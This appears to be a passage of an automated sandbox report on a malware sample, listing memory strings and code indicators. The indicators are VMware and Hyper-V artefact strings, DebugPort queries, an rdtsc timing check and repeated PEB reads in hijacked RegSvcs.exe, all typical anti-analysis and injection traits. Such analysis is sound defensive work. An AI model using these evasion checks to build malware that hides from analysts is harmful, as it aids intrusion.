            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: 26700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAK
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000002.00000000.256810528.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000002.00000002.516234509.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: explorer.exe, 00000002.00000002.504133649.0000000001398000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: vOKMFxiCYt.exe, 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000002.00000000.256227902.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00409A90 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040ACD0 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01674120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01712073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01721074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01670050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01724015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016558EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016EB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016990AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016820A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01683B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01725BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01661B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0170B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0169927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01659240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016E4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01694A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01668A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01655210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01673A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0168D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0167C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01693D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01677D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01728D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01663D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01684D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0165AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016DA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01708DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0166D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0171FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_016835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01681DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_017205AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01682581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01652D8A mov eax, dword ptr fs:[00000030h]
